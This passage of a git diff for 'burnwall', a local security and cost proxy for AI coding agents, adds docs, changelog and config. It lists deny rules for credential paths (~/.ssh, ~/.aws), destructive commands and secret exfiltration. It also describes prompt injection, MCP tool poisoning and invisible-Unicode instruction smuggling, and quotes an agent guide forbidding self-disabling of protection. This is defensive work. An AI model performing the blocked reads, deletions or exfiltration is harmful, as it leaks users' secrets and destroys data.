Windows refuses to roll back + while the proxy is running so it can replace the binary safely. + - **Sourced env-file activation model** — one burnwall-owned file + (`~/.config/burnwall/env.sh` / `%APPDATA%\burnwall\env.ps1`) holds the + routing exports; the user's rc gets one idempotent source line. Disable by + truncating the env file — one place to revert.
+- **`burnwall enable-routing` / `disable-routing`** — write/clear the env file, + install the rc-hook, and emit eval-able exports for immediate-effect + activation in the current shell (`eval "$(burnwall enable-routing)"` on POSIX, + `burnwall enable-routing --eval | Out-String | Invoke-Expression` on + PowerShell). `enable-routing` runs a `/healthz` preflight against the proxy + before activating. +- **`burnwall install-service` / `uninstall-service`** — registers burnwall as a + login-time service so the proxy auto-starts. User-scoped (no admin needed) on + all three platforms: launchd LaunchAgent on macOS, systemd user unit on Linux, + Windows Scheduled Task at logon. +- **`/healthz`** local probe — returns 200 without touching upstreams. Used by + the activation preflight, the supervisor circuit breaker, and any external + monitor. +- **Extended `burnwall init`** — two-step interactive flow that now also offers + login-service install and routing activation in the same run. `--apply` to + execute, `--yes` for unattended scripted use, `--install-service` to opt in to + the supervisor. +- **Local pricing overrides** — drop a `~/.burnwall/pricing.toml` to override or + add model rates without waiting for a release. Entries take precedence over the + built-in rate card and handle date-suffixed model IDs automatically, so a + brand-new model can be priced immediately and a mid-cycle price change is a + two-line edit. This is the escape hatch the staleness warning always + advertised — now actually wired up. +- **`burnwall pricing` command** — `list` shows the effective rate card (built-in + plus overrides, with the source of each), `path [--init]` prints/scaffolds the + override file. 
+- **Signed remote pricing cards** — `burnwall pricing update` fetches a + `pricing.toml` from a URL (default: the latest GitHub release asset) and + installs it **only** if its detached Ed25519 signature verifies against a + trusted `[pricing].publishers` key — verify-before-parse, no fail-open. + `pricing sign` / `pricing verify` cover the publisher and offline-check sides, + reusing the same key format as `burnwall rules keygen`. Lets prices ship + between binary releases without giving up zero-trust. + +### Changed + +- **`burnwall init` output reworked** — dry-run output now lists the two actions + (routing + service) with the exact file paths and exports that would be + written. The legacy `append_to_rc` helper is kept (still used by tests) but + routing activation now goes through the new sourced env-file path. +- **`burnwall status`** — the stale-pricing warning now points at + `burnwall pricing path --init`, and an active-override count is shown (plus a + `pricing_override_count` field in `status --json`). + +## [0.9.3] — 2026-05-29 + +### Fixed + +- **Path/command security rules are now case- and separator-insensitive**, so an + access to `~/.SSH/id_rsa` — or a mixed `\`/`/` Windows path — can no longer slip + past a `~/.ssh` deny rule on case-insensitive filesystems (Windows, default macOS). +- **`start --daemon`** now forwards the `--upstream-google` and + `--rewrite-anthropic-cache` flags to the background process instead of dropping them. + +### Added + +- **Opt-in cost-spiral enforcement** — set `[loop_detection].cost_spiral_enforce = true` + to block the next request once rolling spend exceeds `max_cost_per_window`. Off by + default; detection still logs a warning regardless. +- **Optional build features** (`audit`, `mcp`, `observe`, `logscrape`, `waste`), all on + by default so the shipped binary is unchanged. `cargo build --no-default-features` + now produces a lean core-proxy build (cost + security + budget + storage). 
+ +### Changed + +- **Migrated to the Rust 2024 edition** with a declared minimum supported Rust version, + and moved lint policy into `Cargo.toml`. +- **SQLite hardening** — WAL journal mode and a busy-timeout, plus response-path writes + now run off the async runtime so the proxy never stalls on disk I/O. + ## [0.9.2] — 2026-05-28 ### Added diff --git a/CLAUDE.md b/CLAUDE.md index 2c9fe9e..8c924db 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -77,6 +77,8 @@ src/ handler.rs — Request/response handler pipeline forwarding.rs — Forward requests to upstream providers streaming.rs — SSE/streaming response handling + cache_injection.rs — Optional Anthropic cache_control rewrite + savings projection + resilience.rs — Same-model endpoint failover + circuit breaking providers/ mod.rs — Provider trait and registry anthropic.rs — Anthropic Messages API parser @@ -105,6 +107,7 @@ src/ config/ mod.rs — TOML config loading and defaults types.rs — Config struct definitions + project.rs — Per-project .burnwall.yaml profile discovery + merge cli/ mod.rs — CLI command definitions start.rs — `burnwall start` command @@ -113,12 +116,17 @@ src/ history.rs — `burnwall history` command config_cmd.rs — `burnwall config` command (incl. 
`config doctor`) init.rs — `burnwall init` (auto-detect + setup) + daemon.rs — Background spawn + liveness/PID-file (used by `start --daemon`/`stop`) + security.rs — `burnwall security` (rule inspection / scan testing) + completions.rs — `burnwall completions` (shell completion scripts) mcp.rs / mcp_watch.rs — `burnwall mcp*` (approvals, audit export, watcher) waste.rs / explore.rs / metrics.rs / digest.rs — insight + observability cmds + cost_per_pr.rs — `burnwall cost-per-pr` (git-attributed spend) rules.rs — `burnwall rules` (install/add/test/sign/verify/fetch) audit.rs / report.rs — `burnwall audit` (seal/verify/aibom/sarif) + `report` observe/ — Local, metadata-only observability metrics.rs / otel.rs / digest.rs — latency p50/p95, OTel span sink, AIBOM digest + attribution.rs — git branch/commit cost attribution mcp/ — MCP firewall + multi-server watcher mod.rs / firewall.rs — routing, tool-poisoning + rug-pull detection audit/ — Cryptographic audit + compliance exports @@ -197,7 +205,7 @@ Scan `tool_use` / `function_call` blocks in the REQUEST body (before forwarding) ## Important Notes for Claude Code Sessions -- Read `docs/SPEC.md` for exact CLI behavior and output formats +- Run `burnwall --help` and read `README.md` for current CLI behavior and output formats - Read `docs/ARCHITECTURE.md` for component design and data flow - Work in focused, scoped sessions — one component at a time - Write tests FIRST for any new parser or calculator logic diff --git a/Cargo.lock b/Cargo.lock index c802108..2221f94 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -171,7 +171,7 @@ checksum = "5d20789868f4b01b2f2caec9f5c4e0213b41e3e5702a50157d699ae31ced2fcb" [[package]] name = "burnwall" -version = "0.9.2" +version = "0.11.0" dependencies = [ "anyhow", "assert_cmd", diff --git a/Cargo.toml b/Cargo.toml index 710c1b2..bc7a385 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -1,7 +1,8 @@ [package] name = "burnwall" -version = "0.9.2" -edition = "2021" +version = "0.11.0" +edition = 
"2024" +rust-version = "1.87" description = "Local proxy for AI coding tools (Claude Code, Codex CLI, Aider): cache-aware cost tracking, path/command security checks, daily budget enforcement. Zero telemetry." # FSL-1.1-MIT is not an SPDX identifier; crates.io rejects it as `license`, # so the license is declared via the file instead. @@ -19,13 +20,34 @@ path-guid = "1B65F07B-49F5-469A-AF2C-8C091A57035A" license = false eula = false +# Optional feature clusters layered on top of the core proxy (cost + security +# + budget + storage). All on by default so the shipped binary is unchanged; +# `--no-default-features` builds the lean core. Implication edges mirror the +# module graph: audit→observe→logscrape and waste→logscrape. +[features] +default = ["audit", "mcp", "observe", "logscrape", "waste"] +logscrape = [] +observe = ["logscrape"] +waste = ["logscrape"] +audit = ["observe"] +mcp = [] + +# Lint policy lives here (not as crate-wide `#![allow]`) so it is visible and +# reviewable. `unused` stays a warning rather than being silenced wholesale. +[lints.rust] +unused = "warn" +rust_2018_idioms = "warn" + +[lints.clippy] +all = "warn" + [dependencies] # Async runtime tokio = { version = "1", features = ["full"] } # HTTP proxy hyper = { version = "1", features = ["full"] } -hyper-util = { version = "0.1", features = ["tokio", "server-auto", "http1", "http2"] } +hyper-util = { version = "0.1", features = ["tokio", "server-auto", "server-graceful", "http1", "http2"] } http-body-util = "0.1" tower = { version = "0.5", features = ["util"] } @@ -81,11 +103,18 @@ tempfile = "3" wiremock = "0.6" # Mock HTTP server for integration tests assert_cmd = "2" # CLI testing predicates = "3" # Assertion helpers +dashmap = "6" # Construct WatchState literals in tests [[test]] name = "proxy_test" path = "tests/integration/proxy_test.rs" +# Own binary (= own process): proxy_test flips the process-global +# BURNWALL_BYPASS env var, which would race the pause/allow-once assertions. 
+[[test]] +name = "pause_test" +path = "tests/integration/pause_test.rs" + [[test]] name = "parser_test" path = "tests/unit/parser_test.rs" @@ -94,6 +123,10 @@ path = "tests/unit/parser_test.rs" name = "pricing_test" path = "tests/unit/pricing_test.rs" +[[test]] +name = "tls_integrity_test" +path = "tests/unit/tls_integrity_test.rs" + [[test]] name = "storage_test" path = "tests/unit/storage_test.rs" @@ -174,10 +207,22 @@ path = "tests/unit/waste_test.rs" name = "observe_test" path = "tests/unit/observe_test.rs" +[[test]] +name = "cost_export_test" +path = "tests/unit/cost_export_test.rs" + [[test]] name = "audit_cli_test" path = "tests/integration/audit_cli_test.rs" +[[test]] +name = "audit_test" +path = "tests/unit/audit_test.rs" + +[[test]] +name = "torture_test" +path = "tests/integration/torture_test.rs" + [profile.release] opt-level = "z" # Optimize for size lto = true # Link-time optimization diff --git a/README.md b/README.md index 1ee93c6..39a6e87 100644 --- a/README.md +++ b/README.md @@ -87,9 +87,10 @@ Works on macOS (arm64 + x86_64) and Linuxbrew. Prebuilt archives for every release are at <https://github.com/intbot/burnwall/releases>: -- `burnwall-aarch64-apple-darwin.tar.gz` — macOS Apple Silicon -- `burnwall-x86_64-apple-darwin.tar.gz` — macOS Intel -- `burnwall-x86_64-unknown-linux-gnu.tar.gz` — Linux x86_64 +- `burnwall-aarch64-apple-darwin.tar.xz` — macOS Apple Silicon +- `burnwall-x86_64-apple-darwin.tar.xz` — macOS Intel +- `burnwall-aarch64-unknown-linux-gnu.tar.xz` — Linux arm64 +- `burnwall-x86_64-unknown-linux-gnu.tar.xz` — Linux x86_64 - `burnwall-x86_64-pc-windows-msvc.zip` — Windows x86_64 Extract and put the `burnwall` binary anywhere on your `PATH`.
@@ -101,6 +102,49 @@ cargo install burnwall # from crates.io git clone https://github.com/intbot/burnwall && cd burnwall && cargo build --release # from source ``` +### Verify your download + +Every release binary carries a GitHub Artifact Attestation (Sigstore keyless +build provenance, SLSA Build L2) — proof it was built from this repo's CI, not +swapped out. Verify before trusting a binary in your traffic path: + +```bash +gh attestation verify burnwall-x86_64-unknown-linux-gnu.tar.xz --repo intbot/burnwall +``` + +Each release also ships per-file `.sha256` checksums and a combined `sha256.sum`: + +```bash +sha256sum --ignore-missing -c sha256.sum +``` + +See [`SECURITY.md`](SECURITY.md) for the full integrity + TLS-handling statement. + +### Windows: if Defender or SmartScreen flags it + +The release binaries aren't code-signed yet, so Windows SmartScreen may show an +"unknown publisher" prompt on first run, and Defender's machine-learning +heuristic can occasionally flag the binary as a false positive — ironically, +partly *because* a local security proxy looks structurally like the things it +protects against. It's a false positive; the binary is the one built by this +repo's CI (verify it with the attestation command above). + +If Defender quarantines the binary while the proxy is running, your AI tools may +start failing with `ConnectionRefused` (they're still pointed at the now-gone +local proxy). To recover: + +``` +burnwall recover # pauses routing so new terminals go direct, and tells you what to restart +``` + +To prevent re-quarantine, exclude Burnwall's directory in an elevated PowerShell: + +```powershell +Add-MpPreference -ExclusionPath "$env:USERPROFILE\.burnwall" +``` + +You can report the false positive to Microsoft at <https://www.microsoft.com/en-us/wdsi/filesubmission>. + ## How It Works Burnwall runs as a local HTTP proxy.
You point your AI tools at it via environment variables: @@ -123,11 +167,32 @@ Every API call flows through Burnwall: Responses are **never modified** — Burnwall reads them, logs the cost, and passes them through unchanged. +### Defense-in-depth, not a silver bullet + +Security rules are evaluated **before the request leaves your machine** — a +blocked request never reaches the provider. That's the point: it's another layer +that holds even when a tool's own approval prompt, allowlist, or sandbox is +bypassed (and those have been, repeatedly). Burnwall doesn't claim you're under +attack; it claims that *if* a prompt-injected agent tries to read `~/.ssh` or +pipe a secret to the network, the rule fires locally first. Pair it with your +tool's native controls — it's designed to complement them, not replace them. + ## Scope: What Burnwall Guards Burnwall sits on the **LLM API path** — the HTTP traffic between your AI tool and Anthropic/OpenAI. Security scanning, budget enforcement, and cost tracking all operate on that traffic. -It does **not** intercept **MCP** (Model Context Protocol) traffic. When your agent calls an MCP server's tools, that traffic flows through your AI tool directly — Burnwall never sees it, so it can't scan or block it. MCP-layer protection is a separate concern; dedicated MCP-firewall tools exist and run cleanly alongside Burnwall. +The LLM-path proxy does **not** automatically see **MCP** (Model Context Protocol) traffic — that flows from your AI tool to MCP servers directly. For that layer, Burnwall ships a dedicated **MCP firewall** you put in front of your MCP servers (`burnwall mcp-watch`): it detects tool-poisoning and "rug-pull" (silent post-approval redefinition) attacks and enforces an approval workflow. Run it alongside the main proxy for end-to-end coverage. + +### The coverage boundary + +Burnwall protects the traffic that **flows through it**. 
It does not man-in-the-middle TLS — it forwards via base-URL routing — so a tool that talks to a provider over a path the base URL can't redirect is simply not visible to it. By design, no proxy that avoids TLS interception can see that traffic. + +In practice: + +- **Routable, fully protected:** Claude Code (including on a Pro/Max subscription), Codex CLI in **API-key mode**, Aider, OpenCode, and other tools that honor `ANTHROPIC_BASE_URL` / `OPENAI_BASE_URL` or an equivalent API-base setting. +- **Not routable, bypasses entirely:** Codex CLI signed in with **ChatGPT login**, which talks to the ChatGPT backend over OAuth. Codex in **API-key mode** routes through Burnwall and can be protected — but it bills per-token instead of your flat subscription, so weigh the cost trade-off before switching. + +So you're never left guessing, Burnwall tells you which of your installed tools are actually behind the firewall: `burnwall init` warns at setup if a tool is in a bypassing mode, and `burnwall status` (and `burnwall watch`) show a per-tool **Coverage** readout — *protected*, *installed but unseen*, or *bypasses*. ## Supported Tools @@ -135,6 +200,7 @@ It does **not** intercept **MCP** (Model Context Protocol) traffic. When your ag |------|---------|---------------| | Claude Code | ✅ Full | `ANTHROPIC_BASE_URL` | | Codex CLI (API key mode) | ✅ Full | `OPENAI_BASE_URL` | +| Codex CLI (ChatGPT login) | ❌ | Not interceptable (OAuth backend) | | Aider | ✅ Full | `--openai-api-base` | | OpenCode | ✅ Full | Settings | | Cline | ✅ Full | Extension settings | @@ -163,6 +229,23 @@ When a rule triggers: Request returned 403 — file was never accessed. 
``` +### False positives + +Every block explains what matched and why, and points at the escape hatches — +all of which take effect on the **running** proxy, with no restart of the proxy +or your AI tool (your agent session survives): + +```bash +burnwall allow-once # let just the NEXT request through, then auto-restore +burnwall pause 5m # relay everything unchecked for a bounded window +burnwall resume # restore protection early +burnwall report-bug # write a sanitized local report (nothing is sent) +``` + +Pauses auto-expire (default 5 minutes, capped at 24 hours) and every status +surface shows a loud `⏸ PAUSED` warning for the whole window — the escape +hatch can't silently outlive the emergency. + ## Cost Output ``` @@ -182,13 +265,26 @@ $ burnwall status Cache savings today: $47.82 ``` -## Privacy +## Trust & privacy + +Burnwall sits in your API traffic path, so it earns that position by being +verifiable, not by asking for trust: -- **100% local.** No data ever leaves your machine (except API forwarding). +- **100% local.** No data ever leaves your machine except the API forwarding you + asked for. Works offline (apart from the forwarding itself). - **Zero telemetry.** No analytics, no phone-home, no tracking. Ever. - **No prompt logging.** Only metadata is stored (model, tokens, cost, timestamp). - **No API key storage.** Keys pass through in headers and are never written to disk. -- **Open source.** Audit the code yourself. +- **Your data, portable.** All metadata lives in a single SQLite file under + `~/.burnwall` (`burnwall.db`). Back it up by copying that one file; export it + any time with `burnwall export --format csv|json`. See + [docs/TROUBLESHOOTING.md](docs/TROUBLESHOOTING.md). +- **Read-only on responses.** Burnwall inspects responses to compute cost and + **never modifies them** — your tool gets the provider's bytes unchanged. +- **Single binary, signed releases.** Install from a checksummed, signed release + (or `cargo install` from source). 
No background services you didn't ask for. +- **Open source.** The "no network calls except forwarding" claim is auditable — + read the proxy code yourself. ## Terms of service diff --git a/SECURITY.md b/SECURITY.md new file mode 100644 index 0000000..2c1e191 --- /dev/null +++ b/SECURITY.md @@ -0,0 +1,66 @@ +# Security + +Burnwall sits in your AI API traffic path, so its own integrity matters as much +as the rules it enforces. This document states what we do to be verifiable, how +TLS is handled, and how to report a vulnerability. + +## Reporting a vulnerability + +Please report security issues privately via GitHub Security Advisories +("Report a vulnerability" on the repository's Security tab) rather than a public +issue. We aim to acknowledge within a few days. + +## Self-integrity: verify what you run + +- **Build provenance (SLSA Build L2).** Every released binary carries a GitHub + Artifact Attestation — Sigstore keyless provenance proving it was built from + this repository's CI. There is no long-lived signing key to leak. + ```bash + gh attestation verify burnwall-x86_64-unknown-linux-gnu.tar.xz --repo intbot/burnwall + ``` +- **Checksums.** Each release ships per-file `.sha256` and a combined + `sha256.sum`: + ```bash + sha256sum --ignore-missing -c sha256.sum + ``` +- **Supply-chain hygiene.** The repository runs OpenSSF Scorecard in CI. The + install one-liners are served over HTTPS only; package-manager installs + (Homebrew, `cargo install`, `cargo binstall`) are the recommended trusted + paths, and the npm wrapper publishes with provenance when that channel is + enabled. +- **Open source.** The proxy, scanner, and pricing logic are auditable — the + "no network calls except forwarding" claim below can be checked in the code. + +## How Burnwall handles your traffic (TLS & data) + +A proxy that terminates or weakens TLS would be a liability. 
Burnwall does not: + +- **TLS is validated, never weakened.** Upstream connections use `rustls` + (`rustls-tls`, with native-TLS disabled) and validate the provider's + certificate like a browser would. Burnwall never disables certificate + validation (no `danger_accept_invalid_certs`) and never injects or installs a + root CA. There is a guard test (`tests/unit/tls_integrity_test.rs`) asserting + these never appear in the source. +- **Responses are read-only.** Burnwall inspects responses to compute cost and + **never modifies them** — your tool receives the provider's bytes unchanged. +- **No plaintext secrets at rest.** API keys pass through in headers and are + never written to disk. Prompt/response **content is never logged** — only + metadata (model, token counts, cost, timestamp). +- **Local only, zero telemetry.** No data leaves your machine except the API + forwarding you configured. No analytics, no phone-home. +- **Fail-open.** If a request body can't be parsed, Burnwall forwards it rather + than break your workflow — it never silently drops your traffic. + +## Kill switch + +If anything ever misbehaves, `burnwall pause` flips the *running* proxy into a +pure relay (no scanning, no budget checks, no storage) and auto-restores after +5 minutes — `burnwall resume` restores it early, and `burnwall allow-once` +relays just the next request. `burnwall self-rollback <version>` reinstalls a +prior release. + +## Scope + +Burnwall reduces risk; it is not a guarantee. Run it as one layer of +defense-in-depth alongside your tool's native permissions/sandbox and least- +privilege credentials — not as a replacement for them.
diff --git a/dist-workspace.toml b/dist-workspace.toml index 9ec30e3..ec29791 100644 --- a/dist-workspace.toml +++ b/dist-workspace.toml @@ -20,6 +20,14 @@ ci = "github" # npm -> an npm package using the esbuild optionalDependencies layout # msi -> a native Windows installer installers = ["shell", "powershell", "homebrew", "npm", "msi"] +# Install to the SAME directory the hand-written README installer (install.ps1 +# / install.sh) uses and persists on PATH (L-C3). Without this, cargo-dist +# defaults to $CARGO_HOME/bin, so `burnwall upgrade` (which runs the dist +# installer) wrote the new binary to a *different* dir than the running one — +# leaving the restart pointed at the old path, a second PATH entry, and an +# autostart Run-key aimed at a now-stale exe. One canonical dir removes the +# whole class. +install-path = "~/.burnwall/bin" # Target platforms to build apps for (Rust target-triple syntax) targets = ["aarch64-apple-darwin", "aarch64-unknown-linux-gnu", "x86_64-apple-darwin", "x86_64-unknown-linux-gnu", "x86_64-pc-windows-msvc"] # Where the Homebrew formula is published (the existing tap repo). @@ -36,3 +44,20 @@ tap = "intbot/homebrew-burnwall" publish-jobs = ["./publish-crates", "./publish-nuget", "./publish-pypi"] # Run a plan-only check on PRs (don't try to build/publish on every PR). pr-run-mode = "plan" +# `release.yml` carries a manual patch over the dist-generated workflow (the +# attestation-retry block — re-apply after any `dist generate`). Without this, +# dist's CI-consistency guard fails `plan` because the committed workflow no +# longer matches what dist would emit. Scope is "ci" only, so every other file +# is still checked for drift. +allow-dirty = ["ci"] +# Generate GitHub Artifact Attestations (Sigstore keyless build provenance, +# SLSA Build L2). Every released binary can then be verified with +# `gh attestation verify <artifact> --repo intbot/burnwall`. No signing key to +# manage — a security tool should be exemplary about its own integrity.
+github-attestations = true +# Code signing is NOT wired yet — unsigned releases can trip Windows Defender / +# SmartScreen and macOS Gatekeeper. The procurement + CI plan (Azure Artifact +# Signing for Windows, Apple Developer ID + notarization for macOS) lives in +# internal/SIGNING.md. Signing must integrate through cargo-dist's codesign hook +# so the SIGNED binary is the one hashed + attested — a post-hoc re-sign would +# break the published checksums and `gh attestation verify`. diff --git a/docs/ARCHITECTURE.md b/docs/ARCHITECTURE.md index ea313ef..d237931 100644 --- a/docs/ARCHITECTURE.md +++ b/docs/ARCHITECTURE.md @@ -150,7 +150,11 @@ The security engine scans the JSON request body before forwarding. It does NOT n } ``` -The scanner does a deep traversal of the JSON looking for string values that match deny patterns. It doesn't need to know which field is which — any string value containing a denied path or command triggers a block. +The scanner does a deep traversal of the JSON looking for string values that match deny patterns. On the LLM proxy path it is **context-aware**: command-shaped rules (denied paths, denied commands, network mounts, destructive commands, exfil techniques) apply only inside tool-call argument subtrees — Anthropic `tool_use.input`, OpenAI `tool_calls` / `function_call` arguments, Gemini `functionCall`. Prose (the system prompt, chat text, tool definitions, tool results) can legitimately *mention* `~/.ssh` or `rm -rf` — project docs describing a deny list, a conversation about backups — and must not be blocked for it. Data-shaped rules (secret detection, DLP) still apply to **every** string leaf, since a credential or card number is worth blocking wherever it sits in the payload. + +Within a conversation, command-shaped rules are further scoped to the **latest assistant turn's in-flight tool round** (the trailing assistant message followed only by tool results). 
Clients resend the full history on every request, so scanning older turns would make one correctly-blocked call re-trigger the 403 forever. The request that carries the dangerous call and its output is blocked — that is the moment the forbidden read's content would leave the machine — but once the user sends a new message the round is adjudicated and the conversation recovers. + +MCP `tools/call` bodies keep the strict whole-body semantics: there, the entire payload *is* a tool invocation, so any string value containing a denied path or command triggers a block. ### Pattern Matching Strategy: - **Path matching:** Expand `~` to actual home dir, normalize paths, check against deny list diff --git a/docs/INTEGRATIONS.md b/docs/INTEGRATIONS.md index 5352ee5..09adaca 100644 --- a/docs/INTEGRATIONS.md +++ b/docs/INTEGRATIONS.md @@ -53,6 +53,18 @@ burnwall start --upstream-openai https://your-gateway.example/v1 burnwall start --upstream-anthropic https://your-upstream.example ``` +To make the chain permanent (no flag on every start), set it in config instead: + +``` +burnwall config set upstreams.openai https://your-gateway.example/v1 +burnwall config set upstreams.anthropic https://your-upstream.example +# back to the provider's own API: +burnwall config set upstreams.openai "" +``` + +A `--upstream-*` flag passed to `burnwall start` still wins over the config value +for that run. + The upstream URL is **your config**, not something a request can change. Burnwall forwards your request unchanged and adds, on the local side: blocking dangerous file-path / command / secret-exfiltration tool calls before they leave the machine, @@ -63,4 +75,64 @@ across every tool — none of which a hosted router can do for you. If you run more than one base URL for a provider, configure `[resilience]` so Burnwall retries the same request against the next endpoint on a connection error -or 5xx. See `docs/SPEC.md`. +or 5xx. Run `burnwall config show` to see the `[resilience]` section. 
+ +## Teach your agent about Burnwall (skills) + +Coding agents work better with the firewall when they understand it. One command +installs a short, burnwall-owned guide where your agent discovers it: + +``` +burnwall skills install # Claude Code + Codex (whichever are present) +burnwall skills show # print the guide without writing anything +burnwall skills uninstall # remove it cleanly +``` + +- **Claude Code** gets `~/.claude/skills/burnwall/SKILL.md` — new sessions pick + it up automatically. +- **Codex CLI** gets a marker-delimited section in `~/.codex/AGENTS.md`; + reinstalls replace it in place and never touch your own content. + +With the guide installed, the agent can answer spend and budget questions from +`burnwall status --json`, explain a security block by reading the block message +and `burnwall security --json`, and run `burnwall scan` on config files. The +guide's one hard rule: the agent must **never weaken protection itself** — no +`allow-once`, no `pause`, no security config edits. Anything state-changing is +suggested to you, never run. A blocked request may be exactly the action +Burnwall exists to stop, so that call stays human-only. + +## Scan agent configs in CI (GitHub Action) + +`burnwall scan` is a **file mode** — no proxy, no live traffic. It checks agent +instruction files (`CLAUDE.md`, `.cursorrules`, `.mcp.json`, anything under +`.claude/` and friends) for two high-confidence problems: + +- a **committed credential** (a real key pattern in a tracked file), and +- **invisible Unicode characters** hidden inside ASCII text — the way hidden + instructions get smuggled into agent config files via an innocent-looking PR. + +Prose that merely *mentions* a dangerous command or sensitive path is never +flagged — config files are documentation, and Burnwall only reports what it is +confident about. 
+ +One step in any workflow uploads findings to the repository's Security tab: + +```yaml +permissions: + security-events: write # for the SARIF upload +steps: + - uses: actions/checkout@v4 + - uses: intbot/burnwall/.github/actions/burnwall-scan@main +``` + +Inputs: `paths` (default `.`), `all-files` (scan every text file, default +`false`), `fail-on-findings` (also fail the job, default `false`), +`upload-sarif` (default `true`), `burnwall-version` (default `latest`). + +Locally, the same scan runs as: + +``` +burnwall scan # agent configs under the current directory +burnwall scan path/to/repo --all-files --fail-on-findings +burnwall scan --sarif report.sarif # SARIF 2.1.0 for any code-scanning tool +``` diff --git a/docs/MCP_REGISTRY.md b/docs/MCP_REGISTRY.md index 6afeb4e..5d7d702 100644 --- a/docs/MCP_REGISTRY.md +++ b/docs/MCP_REGISTRY.md @@ -14,8 +14,8 @@ burnwall mcp-watch --upstream [--port 4101] [--require-app Point your MCP client at the watcher's local address instead of the upstream directly. Multiple servers can be fronted via `[[mcp.servers]]` in -`~/.burnwall/config.toml`; auto-approve/deny globs go under `[mcp]` (see -`docs/SPEC.md`). +`~/.burnwall/config.toml`; auto-approve/deny globs go under `[mcp]` (run +`burnwall config show` to see the current MCP section). ## Registry manifest diff --git a/docs/RULES.md b/docs/RULES.md new file mode 100644 index 0000000..b12f57a --- /dev/null +++ b/docs/RULES.md @@ -0,0 +1,127 @@ +# Security rules + +Every block Burnwall raises has a stable **rule id** (the same token you see in +`burnwall security`, in logs, and in an `x-burnwall-blocked` header). This page +is the reference for what each rule guards against and how to proceed when it's +a false positive. 
+ +You don't need this page to get an answer in the moment — the CLI carries the +same text: + +```bash +burnwall security --days 7 # list recent blocks and their ids +burnwall explain <id> # what fired, why, and how to proceed +``` + +Each rule below is anchored by its id, so a `/rules/<id>` reference resolves to +the matching `#<id>` section here. + +When something is a genuine false positive, the escape hatches all act on the +**running** proxy — no restart of the proxy or your AI tool: + +```bash +burnwall allow-once # let just the NEXT request through, then auto-restore +burnwall pause 5m # relay everything unchecked for a bounded window +``` + +--- + +## canary_triggered +**Canary tripwire fired** + +- **Why:** A credential you planted as bait (`security.canaries`) appeared in an + outbound payload. It has no legitimate use, so any request carrying it is an + exfiltration signal. +- **How to proceed:** This is almost never a false positive. If you deliberately + sent the canary, remove it from `security.canaries` or run the one call with + `burnwall allow-once`. + +## destructive_blocked +**Catastrophic command** + +- **Why:** A tool call carried a data-loss-grade command (recursive force-delete, + disk wipe, destructive SQL), detected by shape rather than a literal string. +- **How to proceed:** If you really intend it, narrow the command, or allow the + single call with `burnwall allow-once`. Prefer scoping the destructive action + to an explicit path. + +## exfil_blocked +**Data-exfiltration technique** + +- **Why:** A tool call matched a command-shaped exfiltration pattern (e.g. a + secret piped to the network, DNS exfiltration). +- **How to proceed:** If the network call is legitimate, run it outside the agent + or use `burnwall allow-once` for the single request. Review what was being sent + first. 
+ +## secret_detected +**Secret / credential in payload** + +- **Why:** The request body contained something matching a known credential + pattern (API key, token, private-key header). Sending it to a model would leak + it. +- **How to proceed:** Remove the credential from what the agent is about to send. + If it is a false positive (a fake/example key), allow the single call with + `burnwall allow-once`. + +## dlp_blocked +**PII / data exfiltration** + +- **Why:** The payload matched a data-loss pattern (card number, SSN). This is + egress/DLP protection against sensitive data leaving in a prompt. +- **How to proceed:** Strip the sensitive value, or allow the single call with + `burnwall allow-once` if it is test data. Consider whether the value belongs in + a prompt at all. + +## misdirection_blocked +**Credential sent to the wrong provider** + +- **Why:** A recognized provider credential was being forwarded to a different + provider's endpoint (e.g. an OpenAI key in a body bound for the Anthropic + upstream). +- **How to proceed:** Point the tool at the correct provider, or disable + `security.block_credential_misdirection` if this routing is intentional. + +## obfuscation_blocked +**Invisible-character obfuscation** + +- **Why:** A tool-call argument was dense with zero-width / invisible Unicode — + content being hidden from filters and from your own review (instruction + smuggling). +- **How to proceed:** Inspect the source of the tool call; this usually means a + poisoned input. Only `allow-once` if you understand why the hidden characters + are there. + +## command_blocked +**Dangerous command** + +- **Why:** A tool call tried to run a command on the deny list (e.g. `chmod 777`, + a fork bomb, `curl` to an unknown host). +- **How to proceed:** Adjust the command, relax the rule in config if it is a + legitimate workflow, or `burnwall allow-once` for the single call. 
+ +## path_blocked +**Denied-path access** + +- **Why:** A tool call referenced a protected path (`~/.ssh`, `~/.aws`, + `/etc/passwd`, …). Reading or writing it from an agent is how credentials and + keys leak. +- **How to proceed:** If the access is intended and safe, allow the single call + with `burnwall allow-once`, or remove the path from the deny list in config. + +## mount_blocked +**Network-mount access** + +- **Why:** A tool call touched a network mount (`/Volumes/`, an SMB/NFS share). + Agent access to network storage is a common data-egress path. +- **How to proceed:** Copy what you need locally, or allow the single call with + `burnwall allow-once` if the mount access is deliberate. + +--- + +## Anything else + +An id Burnwall doesn't have a specific card for (a newer rule, or one authored +in a rule pack) falls back to a generic block. Run `burnwall security --days 7` +to see recent blocks, or `burnwall allow-once` to let the next request through +unchecked. diff --git a/docs/SPEC.md b/docs/SPEC.md deleted file mode 100644 index 61af253..0000000 --- a/docs/SPEC.md +++ /dev/null @@ -1,612 +0,0 @@ -# Burnwall Specification - -## Scope - -This spec describes Burnwall's CLI commands, proxy behavior, security engine, -and storage schema. - ---- - -## CLI Commands - -### `burnwall init` - -Auto-detect installed AI tools and configure environment variables. - -``` -$ burnwall init - -🔍 Detecting AI tools... - ✓ Claude Code found - ✓ Codex CLI found - ✗ Aider not found - -🔧 Configuring environment... - → Added ANTHROPIC_BASE_URL=http://localhost:4100/anthropic to ~/.zshrc - → Added OPENAI_BASE_URL=http://localhost:4100/openai to ~/.zshrc - -🛡️ Default security rules applied: - → Blocking access to: ~/.ssh, ~/.aws, ~/.gnupg, ~/.kube - → Blocking commands: rm -rf /, chmod 777 - -💰 Default budget: $50/day (change with `burnwall config set budget.daily `) - -✅ Setup complete. Run `source ~/.zshrc` then `burnwall start`. - -What's your primary goal? 
